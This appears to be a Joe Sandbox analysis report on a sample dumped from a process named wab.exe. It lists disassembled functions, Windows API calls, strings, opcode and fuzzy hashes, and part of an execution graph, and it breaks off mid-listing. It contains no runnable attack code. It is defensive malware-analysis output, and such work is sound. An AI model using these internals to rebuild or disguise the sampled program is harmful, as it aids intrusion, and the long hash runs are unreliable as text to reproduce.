                                                                                                                • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402FD7
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                • strlen.MSVCRT ref: 00403006
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2754987064-0
                                                                                                                • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 764393265-0
                                                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                                                • String ID:
                                                                                                                • API String ID: 979780441-0
                                                                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memcpy.MSVCRT ref: 004134E0
                                                                                                                • memcpy.MSVCRT ref: 004134F2
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                                                • String ID:
                                                                                                                • API String ID: 1386444988-0
                                                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InvalidateMessageRectSend
                                                                                                                • String ID: d=E
                                                                                                                • API String ID: 909852535-3703654223
                                                                                                                • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                                                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 0040F79E
                                                                                                                • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcschr$memcpywcslen
                                                                                                                • String ID: "
                                                                                                                • API String ID: 1983396471-123907689
                                                                                                                • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                • memcpy.MSVCRT ref: 0040C024
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer_memicmpmemcpy
                                                                                                                • String ID: URL
                                                                                                                • API String ID: 2108176848-3574463123
                                                                                                                • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemcpy
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2789212964-323797159
                                                                                                                • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf
                                                                                                                • String ID: %%-%d.%ds
                                                                                                                • API String ID: 3988819677-2008345750
                                                                                                                • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                                                                • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040E770
                                                                                                                • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendmemset
                                                                                                                • String ID: F^@
                                                                                                                • API String ID: 568519121-3652327722
                                                                                                                • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PlacementWindowmemset
                                                                                                                • String ID: WinPos
                                                                                                                • API String ID: 4036792311-2823255486
                                                                                                                • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                • String ID: _lng.ini
                                                                                                                • API String ID: 383090722-1948609170
                                                                                                                • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                                                                • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                • API String ID: 2773794195-880857682
                                                                                                                • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                                                                                • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 438689982-0
                                                                                                                • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                                                                • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1860491036-0
                                                                                                                • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memcmp.MSVCRT ref: 00408AF3
                                                                                                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                                                                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                                                                                • memcmp.MSVCRT ref: 00408B2B
                                                                                                                • memcmp.MSVCRT ref: 00408B5C
                                                                                                                • memcpy.MSVCRT ref: 00408B79
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcmp$memcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 231171946-0
                                                                                                                • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcslen$wcscat$wcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1961120804-0
                                                                                                                • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:2.4%
                                                                                                                Dynamic/Decrypted Code Coverage:20.4%
                                                                                                                Signature Coverage:0.5%
                                                                                                                Total number of Nodes:849
                                                                                                                Total number of Limit Nodes:16
                                                                                                                execution_graph 34110 40fc40 70 API calls 34283 403640 21 API calls 34111 427fa4 42 API calls 34284 412e43 _endthreadex 34285 425115 76 API calls __fprintf_l 34286 43fe40 133 API calls 34114 425115 83 API calls __fprintf_l 34115 401445 memcpy memcpy DialogBoxParamA 34116 440c40 34 API calls 33239 444c4a 33258 444e38 33239->33258 33241 444c56 GetModuleHandleA 33242 444c68 __set_app_type __p__fmode __p__commode 33241->33242 33244 444cfa 33242->33244 33245 444d02 __setusermatherr 33244->33245 33246 444d0e 33244->33246 33245->33246 33259 444e22 _controlfp 33246->33259 33248 444d13 _initterm __getmainargs _initterm 33249 444d6a GetStartupInfoA 33248->33249 33251 444d9e GetModuleHandleA 33249->33251 33260 40cf44 33251->33260 33255 444dcf _cexit 33257 444e04 33255->33257 33256 444dc8 exit 33256->33255 33258->33241 33259->33248 33311 404a99 LoadLibraryA 33260->33311 33262 40cf60 33297 40cf64 33262->33297 33318 410d0e 33262->33318 33264 40cf6f 33322 40ccd7 ??2@YAPAXI 33264->33322 33266 40cf9b 33336 407cbc 33266->33336 33271 40cfc4 33354 409825 memset 33271->33354 33272 40cfd8 33359 4096f4 memset 33272->33359 33277 40d181 ??3@YAXPAX 33279 40d1b3 33277->33279 33280 40d19f DeleteObject 33277->33280 33278 407e30 _strcmpi 33281 40cfee 33278->33281 33383 407948 ??3@YAXPAX ??3@YAXPAX 33279->33383 33280->33279 33283 40cff2 RegDeleteKeyA 33281->33283 33284 40d007 EnumResourceTypesA 33281->33284 33283->33277 33286 40d047 33284->33286 33287 40d02f MessageBoxA 33284->33287 33285 40d1c4 33384 4080d4 ??3@YAXPAX 33285->33384 33289 40d0a0 CoInitialize 33286->33289 33364 40ce70 33286->33364 33287->33277 33381 40cc26 strncat memset RegisterClassA CreateWindowExA 33289->33381 33291 40d1cd 33385 407948 ??3@YAXPAX ??3@YAXPAX 33291->33385 33293 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33382 40c256 PostMessageA 33293->33382 33297->33255 33297->33256 33298 40d061 ??3@YAXPAX 33298->33279 33300 40d084 DeleteObject 33298->33300 33299 40d09e 33299->33289 33300->33279 33303 40d0f9 GetMessageA 33304 40d17b 33303->33304 33305 40d10d 33303->33305 33304->33277 33306 40d113 TranslateAccelerator 33305->33306 33308 40d145 IsDialogMessage 33305->33308 33309 40d139 IsDialogMessage 33305->33309 33306->33305 33307 40d16d GetMessageA 33306->33307 33307->33304 33307->33306 33308->33307 33310 40d157 TranslateMessage DispatchMessageA 33308->33310 33309->33307 33309->33308 33310->33307 33312 404ac4 GetProcAddress 33311->33312 33315 404ae8 33311->33315 33313 404ad4 33312->33313 33314 404add FreeLibrary 33312->33314 33313->33314 33314->33315 33316 404b13 33315->33316 33317 404afc MessageBoxA 33315->33317 33316->33262 33317->33262 33319 410d17 LoadLibraryA 33318->33319 33320 410d3c 33318->33320 33319->33320 33321 410d2b GetProcAddress 33319->33321 33320->33264 33321->33320 33323 40cd08 ??2@YAPAXI 33322->33323 33325 40cd26 33323->33325 33326 40cd2d 33323->33326 33393 404025 6 API calls 33325->33393 33328 40cd66 33326->33328 33329 40cd59 DeleteObject 33326->33329 33386 407088 33328->33386 33329->33328 33331 40cd6b 33389 4019b5 33331->33389 33334 4019b5 strncat 33335 40cdbf _mbscpy 33334->33335 33335->33266 33395 407948 ??3@YAXPAX ??3@YAXPAX 33336->33395 33338 407e04 33396 407a55 33338->33396 33341 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33348 407cf7 33341->33348 33342 407ddc 33342->33338 33408 407a1f 33342->33408 33344 407d7a ??3@YAXPAX 33344->33348 33348->33338 33348->33341 33348->33342 33348->33344 33399 40796e 7 API calls 33348->33399 33400 406f30 33348->33400 33350 407e30 33351 407e57 33350->33351 33352 407e38 33350->33352 33351->33271 33351->33272 33352->33351 33353 407e41 _strcmpi 33352->33353 33353->33351 33353->33352 33414 4097ff 33354->33414 33356 409854 33419 409731 33356->33419 33360 4097ff 3 API calls 33359->33360 33361 409723 33360->33361 33439 40966c 33361->33439 33453 4023b2 33364->33453 33370 40ced3 33542 40cdda 7 API calls 33370->33542 33371 40cece 33374 40cf3f 33371->33374 33494 40c3d0 memset GetModuleFileNameA strrchr 33371->33494 33374->33298 33374->33299 33377 40ceed 33521 40affa 33377->33521 33381->33293 33382->33303 33383->33285 33384->33291 33385->33297 33394 406fc7 memset _mbscpy 33386->33394 33388 40709f CreateFontIndirectA 33388->33331 33390 4019e1 33389->33390 33391 4019c2 strncat 33390->33391 33392 4019e5 memset LoadIconA 33390->33392 33391->33390 33392->33334 33393->33326 33394->33388 33395->33348 33397 407a65 33396->33397 33398 407a5b ??3@YAXPAX 33396->33398 33397->33350 33398->33397 33399->33348 33401 406f37 malloc 33400->33401 33402 406f7d 33400->33402 33404 406f73 33401->33404 33405 406f58 33401->33405 33402->33348 33404->33348 33406 406f6c ??3@YAXPAX 33405->33406 33407 406f5c memcpy 33405->33407 33406->33404 33407->33406 33409 407a38 33408->33409 33410 407a2d ??3@YAXPAX 33408->33410 33412 406f30 3 